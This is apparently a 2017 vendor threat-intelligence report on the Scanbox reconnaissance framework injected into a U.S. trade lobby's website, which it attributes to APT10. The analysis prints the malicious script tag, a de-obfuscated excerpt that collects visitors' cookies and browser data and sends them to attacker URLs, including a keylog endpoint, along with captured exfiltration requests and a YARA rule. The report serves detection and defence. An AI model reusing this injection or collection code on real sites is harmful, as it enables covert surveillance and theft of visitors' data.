Operation TradeSecret: Cyber Espionage at the Heart of Global Trade

Wednesday, April 5, 2017


In late February, Fidelis Cybersecurity observed a strategic web compromise on a prominent U.S. lobbying group that served up malware to a very specific set of targets. The malware we observed has been used exclusively by Chinese nation-state threat actors in our observation and according to previously published research.

Based on our observations, we estimate that it is highly probable that this activity – which we’re calling ‘Operation TradeSecret’ -- targeted key private-sector players involved in lobbying efforts around United States' foreign trade policy. Subsequent research has led us to recover artifacts that indicate that a similar operation was conducted by threat actors targeting government officials in Japan. The connections we can draw from the Japanese campaign lead us to estimate that it is highly probable that the actors involved are known as APT10 (aka Stone Panda) in the threat research community.

Trade policy was at the center of the recent U.S. presidential election and is sure to feature prominently on the agenda when President Trump meets for the first time with China President Xi Jinping in Florida this week.

Key findings:
  • We observed a brief, targeted operation in which visitors to select webpages, including those used to register for specific meetings at the National Foreign Trade Council, a prominent U.S. trade lobby group, were served reconnaissance malware known as the ‘Scanbox’ framework.
  • In the research community, Scanbox has exclusively been known to have been used by threat actors associated with, or sponsored by, the Chinese government. Our most recent observation of the use of Scanbox was on a Uygher political site.
  • Subsequent research has revealed artifacts suggesting that a similar campaign was conducted shortly after that involved a site masquerading as the Ministry of Foreign Affairs of Japan.
  • This site has been included in research recently made available by PWC UK and BAE Systems in their paper titled Operation CloudHopper. While their observations are focused on private enterprises and government in the UK and Japan, ours were clearly impacting US interests.

This paper documents our findings around the live campaign we observed, as well as technical details to allow other researchers to extend visibility into these actions. Fidelis Cybersecurity products detect all activity described in this report.

 

View the Webinar

Join Hardik Modi, VP of Threat Research, and John Bambenek, Manager of Threat Systems, to learn more about the key findings of this reconnaissance malware called "Scanbox."


The Campaign

Fidelis observed, between February 27 and March 1, specific pages on the website of the National Foreign Trade Council (NFTC) including a link that led to a remote script that would execute when anyone visited that page. That remote script was the Scanbox framework, a well-known web reconnaissance tool that has been observed in previous campaigns dating back to at least 2014.

We first observed the inject on the registration page for a board of directors meeting in Washington D.C., scheduled for March 7, 2017.



The injected link would run the Scanbox framework on the computer of anyone who visited the web page.

Scanbox provides multiple capabilities to threat actors. It can be used to determine the versions of applications, as well as other selected tools, such as JavaScript keyloggers, running on the target's machine. The information gathered with this reconnaissance can be used in phishing campaigns directed toward targeted individuals. These campaigns can then exploit specific vulnerabilities known to exist within the user's applications.

The injected link led to a site called personanddog[ . ]info. This domain was registered on January 1, 2017. The malicious JavaScript was served up from the sub-domain club.personanddog[ . ]info, which was directed to a non-routable IP address on March 1, 2017. The site itself was hosted at the IP address 198.100.119[ . ]4.

The link from the NFTC site was removed on March 2. In our observation, the link was removed after the Scanbox site was taken down. We believe that the operation had almost certainly concluded by that time.

Scanbox was previously reported to have been used by multiple Chinese actor groups that are believed to be state sponsored, including the ones thought to be behind well-publicized intrusions in recent years -- namely, the Anthem Healthcare and the U.S. Office of Personnel Management (OPM) breaches.

Fidelis has made other previous observations of Scanbox in various campaigns. In the most recent incident, we observed that it was inserted on a Uygher cultural news site. The Uyghers are an ethnic minority group in Xinjiang province in China, where a struggle for political rights has been ongoing for a few decades. In that instance, the framework was hosted here: support1.freetcp[ . ]com.
 

The Targets

A web-cache listing the NFTC board of directors is here. These organizations represent some of the largest U.S. private sector companies that, presumably, have a keen interest in U.S. trade policy. Since the strategic web compromise was observed on the registration page for the board of directors meeting, it can be surmised that the campaign targeted the individuals visiting the site to register for the meeting.

NFTC members have been key participants in the dialogue around the composition of the new trade policy framework being formulated within the Trump administration. One example of this is the advocacy for the appointment of a new U.S. Trade Representative, as evidenced by this statement issued by the Chair of the NFTC on February 13.

All organizations that have representatives on the board of directors of the NFTC -- or those who would have a reason to visit the site -- should investigate potentially impacted hosts using indicators provided in this report. Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks -- such as spearphishing campaigns.

Fidelis Cybersecurity conveyed its findings to the NFTC shortly after our initial observations.
 

Technical Analysis

ScanBox is a framework written in JavaScript and PHP that allows an attacker to perform reconnaissance and key logging of visitors to a compromised website without requiring any malware to be downloaded or installed. According to PwC, the ScanBox framework has been utilized by a number of groups who conduct espionage attacks, e.g. groups that include those behind the 2014/15 Forbes and Anthem attacks. Some of the actors known to have used it are called C0d0s0 and Deep Panda within the research community.

According to PwC and AlienVault, the Scanbox framework has various plugins that will load depending on the browser.

Plugins:

* Software reconnaissance / Enumeration
* Browser plugin (Browser version)
* Adobe Flash recon / Enumerates Adobe Flash versions
* Adobe PDF reader recon / Enumerates Acrobat Reader versions
* SharePoint recon
* Chrome security plugins recon
* Microsoft Office recon / Enumerates Microsoft Office versions
* Java recon / Enumerates Java versions
* Internal IP recon
* JavaScript keylogger (Implements a keylog functionality trough JavaScript that logs all the keystrokes the victim is typing inside the compromised website. No malware executable needs to be deployed to the system.

Other features identified are:

* Operating system id
* Local Time on the system
* Language settings
* Antivirus installed

Reconnaissance is used to allow attackers to later launch attacks against system vulnerabilities based on data obtained from the system.

In the NTFC page, the injected code was:

<script src=hxxp://club.personanddog [ . ] info/file/i/?1></script>

The above reference point to "1.js" in that server. Research on this domain lead us to the following "1.js" file at VT, which appears to be the one hosted at the above referenced domain: c88b11367a1f4625d4e7a8fb3a45f4c5.

The “1.js” file was first submitted to VirusTotal and Hybrid-Analysis[ . ]com on March 1, 2017. As of March 7, 2017, this Scanbox script has zero (0) AV detections as observed by a popular scanner. During analysis of the script, we discovered that this is an obfuscated version of the Scanbox script. Key changes  have been made to variables in order to bypass classic signature detections.

When the observed Scanbox script runs, the visitor’s system is observed performing the following requests:

  • POST request
    hxxp://club.personanddog[ . ]info/file/i/recv.php)

     

    POST /file/i/recv.php HTTP/1.1
    Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
    Referer: [removed_by_analyst]
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Host: club.personanddog[ . ]info
    Content-Length: 741
    Connection: Keep-Alive
    Cache-Control: no-cache

    projectidx-46356=MQ%3D%3D&seedx-46356=NjY3NDE0ODg0NTM0MTg3NzY%3D&ipx-46356=[base64_encoded_data_removed_by_examiner]%3D%3D&referrerx-46356=&agentx-46356=TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgLk5FVDQuMEM7IC5ORVQ0LjBFKQ%3D%3D&locationx-46356=[base64_encoded_data_removed_by_examiner]&toplocationx-46356=[base64_encoded_data_removed_by_examiner]&cookiex-46356=cmVjb3JkaWQ9NjY3NDE0ODg0NTM0MTg3NzY%3D&titlex-46356=&domainx-46356=[base64_encoded_data_removed_by_examiner]%3D&charsetx-46356=d2luZG93cy0xMjUy&screenx-46356=MTYyOHg4MTE%3D&platformx-46356=V2luMzI%3D&langx-46356=ZW4tdXM%3D&random=x-46356

  • GET requests

    hxxp://club.personanddog[ . ]info/file/i/d.php?NztCm_NcDkh==2
    hxxp://club.personanddog[ . ]info/file/i/d.php?NztCm_NcDkh==4
    hxxp://club.personanddog[ . ]info/file/i/d.php?NztCm_NcDkh==7
    hxxp://club.personanddog[ . ]info/file/i/d.php?NztCm_NcDkh==10
    hxxp://club.personanddog[ . ]info /file/i/d.php?NztCm_NcDkh==3
    hxxp://club.personanddog[ . ]info/file/i/d.php?NztCm_NcDkh==5
    hxxp://club.personanddog[ . ]info/file/i/d.php?NztCm_NcDkh==9
    hxxp://club.personanddog[ . ]info/file/i/d.php?NztCm_NcDkh==14
    hxxp://club.personanddog[ . ]info/file/i/s.php?seed=NjY3NDE0ODg0NTM0MTg3NzY=&alivetime=MTQ4ODQ1MzQ3MQ==&r=0.7699475450211448
    hxxp://club.personanddog[ . ]info/file/i/s.php?seed=NjY3NDE0ODg0NTM0MTg3NzY=&alivetime=MTQ4ODQ1MzQ3NQ==&r=0.5651832161071517
    hxxp://club.personanddog[ . ]info/file/i/d.php?
Injected Javascript Analysis

The “1.js” Scanbox script (MD5: c88b11367a1f4625d4e7a8fb3a45f4c5) contains obfuscated JavaScript obfuscated code.

To draw a clear connection between the de-obfuscated version of the 1.js script and the raw Scanbox script, consider the following section from the code:

var NztCm_NcDkh={};

NztCm_NcDkh[basicposturl]=hxxp://club.personanddog[ . ]info/file/i/recv.php;
NztCm_NcDkh[basicliveurl]=hxxp://club.personanddog[ . ]info/file/i/s.php;
NztCm_NcDkh[basicplguinurl]=hxxp://club.personanddog[ . ]info/file/i/p.php;
NztCm_NcDkh[basicposturlkeylogs]=hxxp://club.personanddog[ . ]info/file/i/k.php;
NztCm_NcDkh[info] = {};
NztCm_NcDkh[info][projectid]=1;
NztCm_NcDkh[info][seed]=__$_$_$_$__$_618__$_$_$_$__$_128();
NztCm_NcDkh[info][ip] = [ip_of_visitor_removed_by_analyst];
NztCm_NcDkh[info][referrer] = window[document][referrer];
NztCm_NcDkh[info][agent] = window[navigator][userAgent];
NztCm_NcDkh[info][location] = window[location][href];
NztCm_NcDkh[info][toplocation] = window[top][location][href];
NztCm_NcDkh[info][cookie] = window[document][cookie];
NztCm_NcDkh[info][title] = window[document][title];
NztCm_NcDkh[info][domain] = window[document][domain];
NztCm_NcDkh[info][charset] = window[document][characterSet] ? window[document][characterSet]: window[document][charset];
NztCm_NcDkh[info][screen] = function()

After making some replacements, the following segment of the code will clearly look like the Scanbox script that has been reported by multiple researchers:

var scanbox={};

scanbox.basicposturl]=hxxp://club.personanddog[ . ]info/file/i/recv.php;
scanbox.basicliveurl]=hxxp://club.personanddog[ . ]info/file/i/s.php;
scanbox.basicplguinurl]=hxxp://club.personanddog[ . ]info/file/i/p.php;
scanbox.basicposturlkeylogs]=hxxp://club.personanddog[ . ]info/file/i/k.php;
scanbox.info] = {};
scanbox.info.projectid=1;
scanbox.info.seed=setRecordid();
scanbox.info.ip = [ip_of_visitor_removed_by_analyst];
scanbox.info.referrer = document.referrer;
scanbox.info.agent = navigator.userAgent;
scanbox.info.location = location.href;
scanbox.info.toplocation = top.location.href;
scanbox.info.cookie = document.cookie;
scanbox.info.title = document.title;
scanbox.info.domain = document.domain;
scanbox.info.charset = document.characterSet ? document.characterSet: document.charset;
scanbox.info.screen = function()
 

Scanbox domain: Other GET request associated the “club.personanddog[ . ]info”

Open-source research led us to discover multiple requests associated with the Scanbox domain.

This information lead us to believe that the Scanbox script could have also been injected in the following pages on the NTFC website:

  • www[ . ]nftc[ . ]org/calendar/calendar.asp (the one originally observed)
  • www[ . ]nftc[ . ]org/newsflash/newsflash.asp
  • www[ . ]nftc[ . ]org
  1. www[ . ]urlquery.net/report.php?id=1488276390528

Report completed on "2017-02-27 15:16:39 CET"
Referer: www[ . ]nftc[ . ]org/calendar/calendar.asp?Mode=CalendarViewDetails&ID=847
Page info recorded:

  NTFC Board of Directors Meeting
March 7, 2016
9:00 am - 1:00 pm
Hosted by Google

  1. www[ . ]urlquery.net/report.php?id=1488236397516

Report completed on "2017-02-28 00:14:04 CET"
Referer: www[ . ]nftc[ . ]org/calendar/calendar.asp?Mode=CalendarViewDetails&ID=861
Page info recorded:

  NTFC Board Dinner with Mexico's Ambassador, Geronimo Gutierrez (By Invitation)
March 7th
RSVP

  1. www[ . ]urlquery[ . ]net/report.php?id=1488269129851

Report completed on "2017-02-28 09:19:36 CET"
Referer: www[ . ]nftc[ . ]org/?id=1

  1. www[ . ]urlquerynet/report.php?id=1488276390528

Report completed on "2017-02-28 11:20:37 CET"
Referer: www[ . ]nftc[ . ]org/?id=1        

  1. www[ . ]urlquery[ . ]net/report.php?id=1488328741216

Report completed on "2017-03-01 01:53:08 CET"
Referer: www[ . ]nftc[ . ]org/newsflash/newsflash.asp?id=236&amp;mode=View&amp;articleid=3222
Page info recorded:

  NFTC Welcomes New Chairman Ambassador Alan Wolf
Date: 3/1/2011
Written by: Jennifer Cummings, The Fratelli Group for NFTC, (202) 822-9491

 

Other Scanbox Observations – Ministry of Foreign Affairs, Japan

As we expanded our research scope, we found the following Scanbox script: b344820e8f719d22bf8d6f939bc40b44. The script appears to have been submitted from an IP address in South Korea on March 14, 2017. As of that day, there were zero (0) AV detections for this obfuscated JavaScript script by the fifty-five (55) AV engines running at VirusTotal.

It should be noted that we have discovered this artifact in a malware repository and not in a live operation. We have also observed that it uses the precise JavaScript obfuscation technique that we decoded in the NFTC site inject.

When the script is accessed, the victim system beaconed to www[ . ]anzen.mofa-go-jp[ . ]com, a site that is masquerading as anzen.mofa.go.jp, a site on the Ministry’s website focused on Overseas Safety. It should be noted that this domain is specifically listed in the Operation CloudHopper report.

The following traffic was observed:

  • GET requests
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==2
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==3
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==4
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==5
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==7
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==9
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==10
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/d.php?ujSmt_eGdPG==14
    www[ . ]anzen.mofa-go-jp[ . ]com/im /images/i/s.php?seed=MTE0NDE0OTAyOTUxMTE2NTY=&alivetime=MTQ5MDI5NTExNQ==&r=0.8954496429823771ages/i/s.php?seed=MTE0NDE0OTAyOTUxMTE2NTY=&alivetime=MTQ5MDI5NTExNQ==&r=0.8954496429823771
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/s.php?seed=MTE0NDE0OTAyOTUxMTE2NTY=&alivetime=MTQ5MDI5NTExOQ==&r=0.5727709010106174
    www[ . ]anzen.mofa-go-jp[ . ]com/images/i/s.php?seed=MTE0NDE0OTAyOTUxMTE2NTY=&alivetime=MTQ5MDI5NTEyMw==&r=0.9903830630314527
  • POST requests
    (www[ . ]anzen.mofa-go-jp[ . ]com/images/i/recv.php)

POST /images/i/recv.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: [removed_by_analyst] Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: www[ . ]anzen.mofa-go-jp[ . ]com
Content-Length: 689
Connection: Keep-Alive
Cache-Control: no-cache

projectidx-87283=Mg%3D%3D&seedx-87283=MTE0NDE0OTAyOTUxMTE2NTY%3D&ipx-87283=MTA0LjIzNi4yMjMuMTYw&referrerx-87283=&agentx-87283=TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMTsgU1YxOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuMC4wNDUwNi42NDg7IC5ORVQgQ0xSIDMuNS4yMTAyMjsgLk5FVDQuMEMp&locationx-87283=[base64_data_removed_by_analyst]&toplocationx-87283=[base64_data_removed_by_analyst]&cookiex-87283=cmVjb3JkaWQ9MTE0NDE0OTAyOTUxMTE2NTY%3D&titlex-87283=&domainx-87283=[base64_data_removed_by_analyst]%3D&charsetx-87283=d2luZG93cy0xMjUy&screenx-87283=MTY3Mng4MDU%3D&platformx-87283=V2luMzI%3D&langx-87283=ZW4tdXM%3D&random=x-87283
 

Yara Detection Rule

The following Yara rule could be used to detect the obfuscated version of the Scanbox Framework script observed in this research:

rule apt_all_JavaScript_ScanboxFramework_obfuscated

{

                  strings:

              $sa1 = /(var|new|return)\s[_\$]+\s?/

                  $sa2 = "function"

                  $sa3 = "toString"

                  $sa4 = "toUpperCase"

                  $sa5 = "arguments.length"

                  $sa6 = "return"

                  $sa7 = "while"

                  $sa8 = "unescape("

                  $sa9 = "365*10*24*60*60*1000"

                  $sa10 = ">> 2"

                  $sa11 = "& 3) << 4"

                  $sa12 = "& 15) << 2"

                  $sa13 = ">> 6) | 192"

                  $sa14 = "& 63) | 128"

                  $sa15 = ">> 12) | 224"

                  condition:

                  all of them

}

View the Webinar

Join Hardik Modi, VP of Threat Research, and John Bambenek, Manager of Threat Systems, to learn more about the key findings of this reconnaissance malware called "Scanbox."